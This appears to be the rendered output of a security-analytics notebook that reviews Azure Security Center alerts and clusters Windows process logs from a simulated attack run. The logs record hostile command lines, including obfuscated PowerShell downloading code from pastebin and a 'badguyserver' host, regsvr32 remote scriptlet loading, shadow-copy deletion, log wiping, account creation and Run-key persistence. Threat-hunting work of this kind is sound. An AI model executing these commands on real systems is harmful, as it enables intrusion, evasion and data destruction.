\\n\"+\n", " \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n", " \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n", " \"
\\n\"+\n", " \"\\n\"+\n",
" \"from bokeh.resources import INLINE\\n\"+\n",
" \"output_notebook(resources=INLINE)\\n\"+\n",
" \"
\\n\"+\n",
" \"\\n\"+\n \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n \"
\\n\"+\n \"\\n\"+\n \"from bokeh.resources import INLINE\\n\"+\n \"output_notebook(resources=INLINE)\\n\"+\n \"
\\n\"+\n \"\n", " | AlertName | \n", "alertCount | \n", "firstAlert | \n", "lastAlert | \n", "
---|---|---|---|---|
0 | \n", "Suspicious Powershell Activity Detected | \n", "16 | \n", "2019-01-15 05:15:14 | \n", "2019-01-15 17:15:15 | \n", "
1 | \n", "Suspicious process executed | \n", "11 | \n", "2019-01-12 00:02:51 | \n", "2019-01-15 17:15:19 | \n", "
2 | \n", "Executable found running from a suspicious location | \n", "9 | \n", "2019-01-15 05:15:20 | \n", "2019-01-15 17:15:19 | \n", "
3 | \n", "DC local group addition - Demo | \n", "6 | \n", "2019-01-10 06:41:45 | \n", "2019-01-15 06:41:46 | \n", "
4 | \n", "Palo Alto admin logged on via SSH - Demo | \n", "6 | \n", "2019-01-10 06:41:50 | \n", "2019-01-15 06:41:55 | \n", "
5 | \n", "DC with MS AM engine failure - Demo | \n", "6 | \n", "2019-01-10 06:43:59 | \n", "2019-01-15 06:44:00 | \n", "
6 | \n", "Suspicious Account Added | \n", "6 | \n", "2019-01-10 20:38:16 | \n", "2019-01-15 22:28:16 | \n", "
7 | \n", "Global domain trust creation - Demo | \n", "6 | \n", "2019-01-10 05:48:09 | \n", "2019-01-15 05:48:11 | \n", "
8 | \n", "Maliciuos IP communication | \n", "6 | \n", "2019-01-10 06:36:03 | \n", "2019-01-15 06:36:02 | \n", "
9 | \n", "Suspicious double extension file executed | \n", "6 | \n", "2019-01-12 00:02:51 | \n", "2019-01-15 17:15:23 | \n", "
10 | \n", "Suspicious SVCHOST process executed | \n", "6 | \n", "2019-01-12 00:02:51 | \n", "2019-01-15 17:15:23 | \n", "
11 | \n", "Azure Security Center test alert (not a threat) | \n", "5 | \n", "2019-01-15 05:15:25 | \n", "2019-01-15 17:15:23 | \n", "
12 | \n", "Suspicious system process executed | \n", "5 | \n", "2019-01-15 05:15:20 | \n", "2019-01-15 17:15:19 | \n", "
13 | \n", "Suspicious Volume Shadow Copy Activity | \n", "5 | \n", "2019-01-15 05:15:20 | \n", "2019-01-15 17:15:23 | \n", "
14 | \n", "Rare SVCHOST service group executed | \n", "5 | \n", "2019-01-15 05:15:25 | \n", "2019-01-15 17:15:23 | \n", "
15 | \n", "Ransomware indicators detected | \n", "5 | \n", "2019-01-15 05:15:25 | \n", "2019-01-15 17:15:23 | \n", "
16 | \n", "Detected Petya ransomware indicators | \n", "5 | \n", "2019-01-15 05:15:25 | \n", "2019-01-15 17:15:23 | \n", "
17 | \n", "Suspiciously named process detected | \n", "5 | \n", "2019-01-15 05:15:15 | \n", "2019-01-15 17:15:17 | \n", "
18 | \n", "Suspicious WindowPosition registry value detected | \n", "5 | \n", "2019-01-15 05:15:20 | \n", "2019-01-15 17:15:19 | \n", "
19 | \n", "Detected obfuscated command line. | \n", "4 | \n", "2019-01-15 05:15:14 | \n", "2019-01-15 17:15:15 | \n", "
\n", " | 101 | \n", "
---|---|
TenantId | \n", "802d39e1-9d70-404d-832c-2de5e2478eda | \n", "
StartTimeUtc | \n", "2019-01-15 05:15:15 | \n", "
EndTimeUtc | \n", "2019-01-15 05:15:15 | \n", "
ProviderAlertId | \n", "265472ff-3820-4dad-8da7-00e39e1a99fd | \n", "
SystemAlertId | \n", "2518547714843218505_265472ff-3820-4dad-8da7-00e39e1a99fd | \n", "
ProviderName | \n", "Detection | \n", "
VendorName | \n", "Microsoft | \n", "
AlertType | \n", "Detected suspicious use of FTP -s Switch | \n", "
AlertName | \n", "Detected suspicious use of FTP -s Switch | \n", "
AlertDisplayName | \n", "Detected suspicious use of FTP -s Switch | \n", "
Description | \n", "Analysis of process creation data from the MSTICALERTSWIN1 detected the use of FTP's \"-s:filenam... | \n", "
Severity | \n", "Medium | \n", "
IsIncident | \n", "False | \n", "
ExtendedProperties | \n", "{'Compromised Host': 'MSTICALERTSWIN1', 'User Name': 'MSTICALERTSWIN1\\MSTICAdmin', 'Account Sess... | \n", "
Entities | \n", "[{'$id': '4', 'DnsDomain': '', 'NTDomain': '', 'HostName': 'MSTICALERTSWIN1', 'NetBiosName': 'MS... | \n", "
ConfidenceLevel | \n", "Unknown | \n", "
ConfidenceScore | \n", "NaN | \n", "
ExtendedLinks | \n", "\n", " |
WorkspaceSubscriptionId | \n", "3c1bb38c-82e3-4f8d-a115-a7110ba70d05 | \n", "
WorkspaceResourceGroup | \n", "contoso77 | \n", "
TimeGenerated | \n", "2019-01-15 05:15:20 | \n", "
ResourceId | \n", "/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/provide... | \n", "
SourceComputerId | \n", "46fe7078-61bb-4bed-9430-7ac01d91c273 | \n", "
CompromisedEntity | \n", "MSTICALERTSWIN1 | \n", "
\n", " | 0 | \n", "
---|---|
Compromised Host | \n", "MSTICALERTSWIN1 | \n", "
User Name | \n", "MSTICALERTSWIN1\\MSTICAdmin | \n", "
Account Session Id | \n", "0xfaac27 | \n", "
Suspicious Process | \n", "c:\\diagnostics\\usertmp\\ftp.exe | \n", "
Suspicious Command Line | \n", ".\\ftp -s:c:\\recycler\\xxppyy.exe | \n", "
Parent Process | \n", "c:\\windows\\system32\\cmd.exe | \n", "
Suspicious Process Id | \n", "0x1580 | \n", "
resourceType | \n", "Virtual Machine | \n", "
ServiceId | \n", "14fa08c7-c48e-4c18-950c-8148024b4398 | \n", "
ReportingSystem | \n", "Azure | \n", "
OccuringDatacenter | \n", "eastus | \n", "
\\n\"+\n", " \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n", " \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n", " \"
\\n\"+\n", " \"\\n\"+\n",
" \"from bokeh.resources import INLINE\\n\"+\n",
" \"output_notebook(resources=INLINE)\\n\"+\n",
" \"
\\n\"+\n",
" \"\\n\"+\n \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n \"
\\n\"+\n \"\\n\"+\n \"from bokeh.resources import INLINE\\n\"+\n \"output_notebook(resources=INLINE)\\n\"+\n \"
\\n\"+\n \"\\n\"+\n", " \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n", " \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n", " \"
\\n\"+\n", " \"\\n\"+\n",
" \"from bokeh.resources import INLINE\\n\"+\n",
" \"output_notebook(resources=INLINE)\\n\"+\n",
" \"
\\n\"+\n",
" \"\\n\"+\n \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n \"
\\n\"+\n \"\\n\"+\n \"from bokeh.resources import INLINE\\n\"+\n \"output_notebook(resources=INLINE)\\n\"+\n \"
\\n\"+\n \"\n", " | TimeGenerated | \n", "LastEventTime | \n", "NewProcessName | \n", "CommandLine | \n", "ClusterSize | \n", "commandlineTokensFull | \n", "pathScore | \n", "isSystemSession | \n", "
---|---|---|---|---|---|---|---|---|
292 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 04:45:24.523 | \n", "C:\\Windows\\System32\\taskhostw.exe | \n", "taskhostw.exe SYSTEM | \n", "1.0 | \n", "2 | \n", "3262 | \n", "True | \n", "
270 | \n", "2019-01-15 04:28:01.517 | \n", "2019-01-15 04:28:33.090 | \n", "C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe | \n", "\"C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe\" /ua /installsource scheduler | \n", "2.0 | \n", "17 | \n", "4895 | \n", "True | \n", "
133 | \n", "2019-01-15 04:35:15.673 | \n", "2019-01-15 04:45:24.523 | \n", "C:\\Windows\\System32\\sppsvc.exe | \n", "C:\\Windows\\system32\\sppsvc.exe | \n", "1.0 | \n", "5 | \n", "2933 | \n", "True | \n", "
134 | \n", "2019-01-15 04:35:16.060 | \n", "2019-01-15 04:45:24.523 | \n", "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe | \n", "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding | \n", "1.0 | \n", "8 | \n", "3546 | \n", "True | \n", "
254 | \n", "2019-01-15 04:42:25.437 | \n", "2019-01-15 05:12:25.403 | \n", "C:\\Windows\\System32\\MusNotification.exe | \n", "C:\\Windows\\system32\\MusNotification.exe Display | \n", "2.0 | \n", "6 | \n", "3826 | \n", "True | \n", "
256 | \n", "2019-01-15 04:43:05.240 | \n", "2019-01-15 04:45:24.523 | \n", "C:\\WindowsAzure\\GuestAgent_2.7.41491.901_2019-01-14_202614\\CollectGuestLogs.exe | \n", "\"CollectGuestLogs.exe\" -Mode:ga -FileName:C:\\WindowsAzure\\CollectGuestLogsTemp\\710dc858-9c96-4df... | \n", "1.0 | \n", "18 | \n", "6421 | \n", "True | \n", "
301 | \n", "2019-01-15 04:44:37.180 | \n", "2019-01-15 04:45:24.523 | \n", "C:\\Windows\\System32\\cmd.exe | \n", "\"cmd\" | \n", "1.0 | \n", "2 | \n", "2570 | \n", "True | \n", "
356 | \n", "2019-01-15 04:45:24.523 | \n", "2019-01-15 04:45:24.523 | \n", "C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\Health Service State\\Resources\\222\\pmfexe.exe | \n", "\"C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\Health Service State\\Resources\\222\\pmfexe.exe... | \n", "1.0 | \n", "27 | \n", "9108 | \n", "True | \n", "
74 | \n", "2019-01-15 05:15:03.017 | \n", "2019-01-15 04:45:24.523 | \n", "C:\\Windows\\System32\\dllhost.exe | \n", "C:\\Windows\\system32\\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | \n", "1.0 | \n", "12 | \n", "3024 | \n", "True | \n", "
75 | \n", "2019-01-15 05:15:03.047 | \n", "2019-01-15 04:45:24.523 | \n", "C:\\Windows\\System32\\cmd.exe | \n", "cmd.exe /c c:\\Diagnostics\\WindowsSimulateDetections.bat c:\\Diagnostics\\UserTmp | \n", "1.0 | \n", "12 | \n", "2570 | \n", "True | \n", "
77 | \n", "2019-01-15 05:15:03.247 | \n", "2019-01-15 05:15:11.260 | \n", "C:\\Windows\\System32\\cmd.exe | \n", "cmd /c echo Any questions about the commands executed here then please contact one of | \n", "2.0 | \n", "16 | \n", "2570 | \n", "False | \n", "
78 | \n", "2019-01-15 05:15:03.257 | \n", "2019-01-15 04:45:24.523 | \n", "C:\\Windows\\System32\\cmd.exe | \n", "cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; marcook@microsoft... | \n", "1.0 | \n", "21 | \n", "2570 | \n", "False | \n", "
80 | \n", "2019-01-15 05:15:03.410 | \n", "2019-01-15 05:15:14.693 | \n", "C:\\Windows\\System32\\net1.exe | \n", "C:\\Windows\\system32\\net1 user adm1nistrator Bob_testing /add | \n", "7.0 | \n", "10 | \n", "2638 | \n", "False | \n", "
82 | \n", "2019-01-15 05:15:03.517 | \n", "2019-01-15 04:45:24.523 | \n", "C:\\Windows\\System32\\net1.exe | \n", "C:\\Windows\\system32\\net1 share TestShare=c:\\testshare /Grant:Users,Read | \n", "1.0 | \n", "13 | \n", "2638 | \n", "False | \n", "
83 | \n", "2019-01-15 05:15:03.543 | \n", "2019-01-15 04:45:24.523 | \n", "C:\\Windows\\System32\\Dism.exe | \n", "dism /online /enable-feature /featurename:File-Services /NoRestart | \n", "1.0 | \n", "11 | \n", "2659 | \n", "True | \n", "
85 | \n", "2019-01-15 05:15:03.830 | \n", "2019-01-15 05:15:19.447 | \n", "C:\\Windows\\System32\\net.exe | \n", "net use q: \\\\MSTICAlertsWin1\\TestShare Bob_testing /User:adm1nistrator | \n", "3.0 | \n", "12 | \n", "2589 | \n", "False | \n", "
86 | \n", "2019-01-15 05:15:03.850 | \n", "2019-01-15 04:45:24.523 | \n", "C:\\Windows\\Temp\\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\\DismHost.exe | \n", "C:\\Windows\\TEMP\\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\\dismhost.exe {D57BA872-53C0-424D-80AE-E4911... | \n", "1.0 | \n", "15 | \n", "4900 | \n", "True | \n", "
87 | \n", "2019-01-15 05:15:04.507 | \n", "2019-01-15 04:45:24.523 | \n", "C:\\Windows\\servicing\\TrustedInstaller.exe | \n", "C:\\Windows\\servicing\\TrustedInstaller.exe | \n", "1.0 | \n", "5 | \n", "4175 | \n", "True | \n", "
94 | \n", "2019-01-15 05:15:10.753 | \n", "2019-01-15 04:45:24.523 | \n", "C:\\Diagnostics\\UserTmp\\regsvr32.exe | \n", ".\\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll | \n", "1.0 | \n", "20 | \n", "3399 | \n", "False | \n", "
95 | \n", "2019-01-15 05:15:10.817 | \n", "2019-01-15 05:15:14.453 | \n", "C:\\Windows\\System32\\svchost.exe | \n", "C:\\Windows\\system32\\svchost.exe -k wsappx | \n", "2.0 | \n", "8 | \n", "3040 | \n", "True | \n", "
96 | \n", "2019-01-15 05:15:11.190 | \n", "2019-01-15 05:15:14.453 | \n", "C:\\Windows\\System32\\win32calc.exe | \n", "\"C:\\Windows\\System32\\win32calc.exe\" | \n", "28.0 | \n", "8 | \n", "3100 | \n", "False | \n", "
122 | \n", "2019-01-15 05:15:11.947 | \n", "2019-01-15 05:15:14.563 | \n", "C:\\Diagnostics\\UserTmp\\implant.exe | \n", "implant.exe k111 | \n", "7.0 | \n", "3 | \n", "3390 | \n", "False | \n", "
125 | \n", "2019-01-15 05:15:12.123 | \n", "2019-01-15 05:15:14.157 | \n", "C:\\Diagnostics\\UserTmp\\cmd.exe | \n", "cmd /c \"echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\" | \n", "3.0 | \n", "21 | \n", "2941 | \n", "False | \n", "
130 | \n", "2019-01-15 05:15:12.393 | \n", "2019-01-15 04:45:24.523 | \n", "C:\\Diagnostics\\UserTmp\\powershell.exe | \n", ".\\powershell -Noninteractive -Noprofile -Command \"Invoke-Expression Get-Process; Invoke-WebRequ... | \n", "1.0 | \n", "25 | \n", "3726 | \n", "False | \n", "
139 | \n", "2019-01-15 05:15:12.847 | \n", "2019-01-15 04:45:24.523 | \n", "C:\\Diagnostics\\UserTmp\\powershell.exe | \n", ".\\powershell -command \"(New-Object Net.WebClient).DownloadString(('ht'+'tp://pasteb' + 'bin/'+'... | \n", "1.0 | \n", "36 | \n", "3726 | \n", "False | \n", "
104 | \n", "2019-01-15 05:15:12.977 | \n", "2019-01-15 05:15:19.583 | \n", "C:\\Diagnostics\\UserTmp\\powershell.exe | \n", ".\\powershell -command {(n`EW-obJ`E`cT N`et`.W`eb`C`li`en`t).DownloadFile('https://blah/png','go... | \n", "2.0 | \n", "24 | \n", "3726 | \n", "False | \n", "
106 | \n", "2019-01-15 05:15:13.100 | \n", "2019-01-15 04:45:24.523 | \n", "C:\\Diagnostics\\UserTmp\\powershell.exe | \n", ".\\powershell.exe -c \"$a = 'Download'+'String'+\"(('ht'+'tp://paste'+ 'bin/'+'raw/'+'pqCwEm17'))\"... | \n", "1.0 | \n", "68 | \n", "3726 | \n", "False | \n", "
108 | \n", "2019-01-15 05:15:13.220 | \n", "2019-01-15 04:45:24.523 | \n", "C:\\Diagnostics\\UserTmp\\powershell.exe | \n", ".\\powershell -c {IEX (New-Object Net.WebClient).DownloadString(('ht'+(\"{2}{0}{1}\"-f ':/','/past... | \n", "1.0 | \n", "53 | \n", "3726 | \n", "False | \n", "
110 | \n", "2019-01-15 05:15:13.337 | \n", "2019-01-15 04:45:24.523 | \n", "C:\\Diagnostics\\UserTmp\\cmd.exe | \n", "cmd /c \".\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t... | \n", "1.0 | \n", "46 | \n", "2941 | \n", "False | \n", "
142 | \n", "2019-01-15 05:15:15.233 | \n", "2019-01-15 05:15:14.770 | \n", "C:\\Windows\\System32\\whoami.exe | \n", "whoami | \n", "3.0 | \n", "0 | \n", "2907 | \n", "False | \n", "
149 | \n", "2019-01-15 05:15:15.520 | \n", "2019-01-15 05:15:15.923 | \n", "C:\\Windows\\System32\\net.exe | \n", "net group \"Domain Admins\" /domain | \n", "2.0 | \n", "8 | \n", "2589 | \n", "False | \n", "
162 | \n", "2019-01-15 05:15:16.020 | \n", "2019-01-15 04:45:24.523 | \n", "C:\\Diagnostics\\UserTmp\\cmd.exe | \n", "cmd /c C:\\Windows\\System32\\mshta.exe vbscript:CreateObject(\"Wscript.Shell\").Run(\".\\powershell.e... | \n", "1.0 | \n", "56 | \n", "2941 | \n", "False | \n", "
163 | \n", "2019-01-15 05:15:16.067 | \n", "2019-01-15 04:45:24.523 | \n", "C:\\Diagnostics\\UserTmp\\netsh.exe | \n", ".\\netsh advfirewall firewall add rule name=RbtGskQ action=allow program=c:\\users\\Bob\\appdata\\Ro... | \n", "1.0 | \n", "18 | \n", "3179 | \n", "False | \n", "
46 | \n", "2019-01-15 05:15:16.167 | \n", "2019-01-15 04:45:24.523 | \n", "C:\\Diagnostics\\UserTmp\\reg.exe | \n", ".\\reg not /domain:everything that /sid:shines is /krbtgt:golden ! | \n", "1.0 | \n", "16 | \n", "2951 | \n", "False | \n", "
47 | \n", "2019-01-15 05:15:16.277 | \n", "2019-01-15 05:15:14.613 | \n", "C:\\Diagnostics\\UserTmp\\cmd.exe | \n", "cmd /c \"systeminfo && systeminfo\" | \n", "23.0 | \n", "10 | \n", "2941 | \n", "False | \n", "
48 | \n", "2019-01-15 05:15:16.340 | \n", "2019-01-15 05:15:14.293 | \n", "C:\\Diagnostics\\UserTmp\\rundll32.exe | \n", ".\\rundll32 /C 12345.exe | \n", "15.0 | \n", "7 | \n", "3391 | \n", "False | \n", "
49 | \n", "2019-01-15 05:15:16.353 | \n", "2019-01-15 05:15:16.520 | \n", "C:\\Diagnostics\\UserTmp\\12345.exe | \n", "12345.exe | \n", "3.0 | \n", "1 | \n", "2888 | \n", "False | \n", "
56 | \n", "2019-01-15 05:15:16.563 | \n", "2019-01-15 05:15:18.403 | \n", "C:\\Diagnostics\\UserTmp\\reg.exe | \n", ".\\reg.exe add \\hkcu\\software\\microsoft\\some\\key\\Run /v abadvalue | \n", "3.0 | \n", "15 | \n", "2951 | \n", "False | \n", "
57 | \n", "2019-01-15 05:15:16.613 | \n", "2019-01-15 04:45:24.523 | \n", "C:\\Diagnostics\\UserTmp\\tsetup.1.exe | \n", "c:\\Diagnostics\\UserTmp\\tsetup.1.exe C:\\Users\\MSTICAdmin\\AppData\\Local\\Temp\\2\\is-01DD7.tmp\\tsetu... | \n", "1.0 | \n", "40 | \n", "3405 | \n", "False | \n", "
59 | \n", "2019-01-15 05:15:16.677 | \n", "2019-01-15 04:45:24.523 | \n", "C:\\Diagnostics\\UserTmp\\netsh.exe | \n", ".\\netsh.exe \"in (*.exe) do start # artificial commandline solely for purposes of triggering test\" | \n", "1.0 | \n", "22 | \n", "3179 | \n", "False | \n", "
60 | \n", "2019-01-15 05:15:16.720 | \n", "2019-01-15 05:15:15.880 | \n", "C:\\Diagnostics\\UserTmp\\cmd.exe | \n", ".\\cmd /c \"cd /d \"C:\\inetpub\\wwwroot\"&powershell Set-ExecutionPolicy RemoteSigned&echo [S]&cd&ec... | \n", "3.0 | \n", "25 | \n", "2941 | \n", "False | \n", "
61 | \n", "2019-01-15 05:15:16.767 | \n", "2019-01-15 04:45:24.523 | \n", "C:\\Diagnostics\\UserTmp\\cmd.exe | \n", ".\\cmd /c \"cd /d \"C:\\inetpub\\wwwroot\"&powershell Enable-WSManCredSSP =2013Role Server -force&ech... | \n", "1.0 | \n", "28 | \n", "2941 | \n", "False | \n", "
62 | \n", "2019-01-15 05:15:16.807 | \n", "2019-01-15 04:45:24.523 | \n", "C:\\Diagnostics\\UserTmp\\cmd.exe | \n", ".\\cmd /c \"cd /d \"C:\\inetpub\\wwwroot\"&powershell winrm set winrm/config/service/Auth @{Kerberos=... | \n", "1.0 | \n", "31 | \n", "2941 | \n", "False | \n", "
63 | \n", "2019-01-15 05:15:16.850 | \n", "2019-01-15 05:15:17.580 | \n", "C:\\Diagnostics\\UserTmp\\cmd.exe | \n", ".\\cmd /c \"cd /d \"C:\\ProgramData\"© \\\\[REDACTED]\\c$\\users\\[REDACTED]\\Documents\\\"Password Chan... | \n", "2.0 | \n", "29 | \n", "2941 | \n", "False | \n", "
64 | \n", "2019-01-15 05:15:16.893 | \n", "2019-01-15 04:45:24.523 | \n", "C:\\Diagnostics\\UserTmp\\cmd.exe | \n", ".\\cmd /c \"cd /d \"C:\\inetpub\\wwwroot\"&c:\\windows\\system32\\inetsrv\\appcmd set config \"Default Web... | \n", "1.0 | \n", "41 | \n", "2941 | \n", "False | \n", "
65 | \n", "2019-01-15 05:15:16.967 | \n", "2019-01-15 04:45:24.523 | \n", "C:\\Diagnostics\\UserTmp\\cmd.exe | \n", ".\\cmd /c \"cd /d \"C:\\inetpub\\wwwroot\"&del C:\\inetpub\\logs\\logFiles\\W3SVC1\\*.log /q&echo [S]&cd&e... | \n", "1.0 | \n", "32 | \n", "2941 | \n", "False | \n", "
67 | \n", "2019-01-15 05:15:17.077 | \n", "2019-01-15 05:15:19.617 | \n", "C:\\Diagnostics\\UserTmp\\sdopfjiowtbkjfnbeioruj.exe | \n", "c:\\Diagnostics\\UserTmp\\sdopfjiowtbkjfnbeioruj.exe | \n", "9.0 | \n", "6 | \n", "5005 | \n", "False | \n", "
68 | \n", "2019-01-15 05:15:17.127 | \n", "2019-01-15 05:15:18.630 | \n", "C:\\Diagnostics\\UserTmp\\doubleextension.pdf.exe | \n", "c:\\Diagnostics\\UserTmp\\doubleextension.pdf.exe | \n", "7.0 | \n", "7 | \n", "4617 | \n", "False | \n", "
69 | \n", "2019-01-15 05:15:17.137 | \n", "2019-01-15 05:15:12.067 | \n", "C:\\Windows\\System32\\vssadmin.exe | \n", "vssadmin delete shadows /all /quiet | \n", "4.0 | \n", "7 | \n", "3131 | \n", "False | \n", "
169 | \n", "2019-01-15 05:15:17.410 | \n", "2019-01-15 05:15:14.640 | \n", "C:\\Diagnostics\\UserTmp\\svchost.exe | \n", "c:\\Diagnostics\\UserTmp\\svchost.exe | \n", "6.0 | \n", "6 | \n", "3411 | \n", "False | \n", "
171 | \n", "2019-01-15 05:15:17.493 | \n", "2019-01-15 04:45:24.523 | \n", "C:\\Windows\\System32\\svchost.exe | \n", "c:\\Windows\\System32\\svchost.exe -k malicious | \n", "1.0 | \n", "9 | \n", "3040 | \n", "False | \n", "
176 | \n", "2019-01-15 05:15:18.080 | \n", "2019-01-15 04:45:24.523 | \n", "C:\\Diagnostics\\UserTmp\\wuauclt.exe | \n", ".\\wuauclt.exe /C \"c:\\windows\\softwaredistribution\\cscript.exe\" | \n", "1.0 | \n", "14 | \n", "3406 | \n", "False | \n", "
190 | \n", "2019-01-15 05:15:18.287 | \n", "2019-01-15 05:15:18.967 | \n", "C:\\Diagnostics\\UserTmp\\lsass.exe | \n", ".\\lsass.exe /C \"c:\\windows\\softwaredistribution\\cscript.exe\" | \n", "2.0 | \n", "14 | \n", "3183 | \n", "False | \n", "
193 | \n", "2019-01-15 05:15:18.337 | \n", "2019-01-15 05:02:28.260 | \n", "C:\\Diagnostics\\UserTmp\\cmd.exe | \n", "cmd /c \"powershell wscript.shell used to download a .gif\" | \n", "5.0 | \n", "14 | \n", "2941 | \n", "False | \n", "
195 | \n", "2019-01-15 05:15:18.450 | \n", "2019-01-15 04:45:24.523 | \n", "C:\\Diagnostics\\UserTmp\\cmd.exe | \n", "cmd /c \"cd /d \"C:\\inetpub\\wwwroot\"&c:\\windows\\system32\\inetsrv\\appcmd set config \"Default Web S... | \n", "1.0 | \n", "39 | \n", "2941 | \n", "False | \n", "
198 | \n", "2019-01-15 05:15:18.553 | \n", "2019-01-15 04:45:24.523 | \n", "C:\\Diagnostics\\UserTmp\\cmd.exe | \n", "cmd /c echo \" SYSTEMINFO && SYSTEMINFO && DEL \" | \n", "1.0 | \n", "17 | \n", "2941 | \n", "False | \n", "
211 | \n", "2019-01-15 05:15:19.223 | \n", "2019-01-15 05:15:19.337 | \n", "C:\\Diagnostics\\UserTmp\\hd.exe | \n", "hd.exe -pslist | \n", "2.0 | \n", "4 | \n", "2837 | \n", "False | \n", "
219 | \n", "2019-01-15 05:15:20.623 | \n", "2019-01-15 04:45:24.523 | \n", "C:\\Windows\\System32\\wermgr.exe | \n", "C:\\Windows\\system32\\wermgr.exe -upload | \n", "1.0 | \n", "7 | \n", "2922 | \n", "True | \n", "
0 | \n", "2019-01-15 05:24:24.010 | \n", "2019-01-15 04:46:24.017 | \n", "C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\Health Service State\\CT_602681692\\NativeDSC\\De... | \n", "\"C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\Health Service State\\CT_602681692\\NativeDSC\\D... | \n", "35.0 | \n", "52 | \n", "12225 | \n", "True | \n", "
1 | \n", "2019-01-15 05:24:24.023 | \n", "2019-01-15 04:46:24.033 | \n", "C:\\Windows\\System32\\conhost.exe | \n", "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1 | \n", "39.0 | \n", "10 | \n", "3028 | \n", "True | \n", "
2 | \n", "2019-01-15 05:24:25.807 | \n", "2019-01-15 04:46:25.800 | \n", "C:\\Windows\\SysWOW64\\wbem\\WmiPrvSE.exe | \n", "C:\\Windows\\sysWOW64\\wbem\\wmiprvse.exe -secured -Embedding | \n", "38.0 | \n", "10 | \n", "3478 | \n", "True | \n", "
3 | \n", "2019-01-15 05:24:26.010 | \n", "2019-01-15 04:46:26.007 | \n", "C:\\Windows\\System32\\cscript.exe | \n", "\"C:\\Windows\\system32\\cscript.exe\" /nologo \"MonitorKnowledgeDiscovery.vbs\" | \n", "71.0 | \n", "13 | \n", "3022 | \n", "True | \n", "
\n", " | ClusterSize | \n", "processName | \n", "CommandLine | \n", "ClusterId | \n", "
---|---|---|---|---|
46 | \n", "1.0 | \n", "reg.exe | \n", ".\\reg not /domain:everything that /sid:shines is /krbtgt:golden ! | \n", "-1.0 | \n", "
56 | \n", "3.0 | \n", "reg.exe | \n", ".\\reg.exe add \\hkcu\\software\\microsoft\\some\\key\\Run /v abadvalue | \n", "7.0 | \n", "
\\n\"+\n", " \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n", " \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n", " \"
\\n\"+\n", " \"\\n\"+\n",
" \"from bokeh.resources import INLINE\\n\"+\n",
" \"output_notebook(resources=INLINE)\\n\"+\n",
" \"
\\n\"+\n",
" \"\\n\"+\n \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n \"
\\n\"+\n \"\\n\"+\n \"from bokeh.resources import INLINE\\n\"+\n \"output_notebook(resources=INLINE)\\n\"+\n \"
\\n\"+\n \"\n", " | IoCType | \n", "Observable | \n", "SourceIndex | \n", "
---|---|---|---|
0 | \n", "windows_path | \n", "C:\\RECYCLER\\xxppyy.exe | \n", "0 | \n", "
1 | \n", "windows_path | \n", ".\\ftp | \n", "0 | \n", "
2 | \n", "windows_path | \n", ".\\reg | \n", "1 | \n", "
3 | \n", "windows_path | \n", ".\\rundll32 | \n", "3 | \n", "
4 | \n", "windows_path | \n", "c:\\users\\MSTICAdmin\\12345.exe | \n", "4 | \n", "
5 | \n", "windows_path | \n", ".\\rundll32 | \n", "4 | \n", "
6 | \n", "windows_path | \n", ".\\rundll32 | \n", "5 | \n", "
7 | \n", "windows_path | \n", ".\\rundll32 | \n", "6 | \n", "
8 | \n", "windows_path | \n", "c:\\users\\MSTICAdmin\\1234.exe | \n", "6 | \n", "
9 | \n", "windows_path | \n", ".\\rundll32 | \n", "7 | \n", "
10 | \n", "windows_path | \n", ".\\reg.exe add \\hkcu\\software\\microsoft\\some\\key\\Run | \n", "8 | \n", "
11 | \n", "dns | \n", "tsetup.1.exe | \n", "9 | \n", "
12 | \n", "dns | \n", "tsetup.1.0.14.tmp | \n", "9 | \n", "
13 | \n", "dns | \n", "tsetup.1.0.14.exe | \n", "9 | \n", "
14 | \n", "windows_path | \n", "c:\\Diagnostics\\UserTmp\\tsetup.1.exe | \n", "9 | \n", "
15 | \n", "windows_path | \n", "C:\\Users\\MSTICAdmin\\AppData\\Local\\Temp\\2\\is-01DD7.tmp\\tsetup.1.0.14.tmp | \n", "9 | \n", "
16 | \n", "windows_path | \n", "C:\\Users\\MSTICAdmin\\Downloads\\tsetup.1.0.14.exe | \n", "9 | \n", "
17 | \n", "windows_path | \n", ".\\rundll32.exe | \n", "10 | \n", "
18 | \n", "windows_path | \n", ".\\netsh.exe | \n", "11 | \n", "
19 | \n", "windows_path | \n", "C:\\inetpub\\wwwroot | \n", "12 | \n", "
20 | \n", "windows_path | \n", ".\\cmd | \n", "12 | \n", "
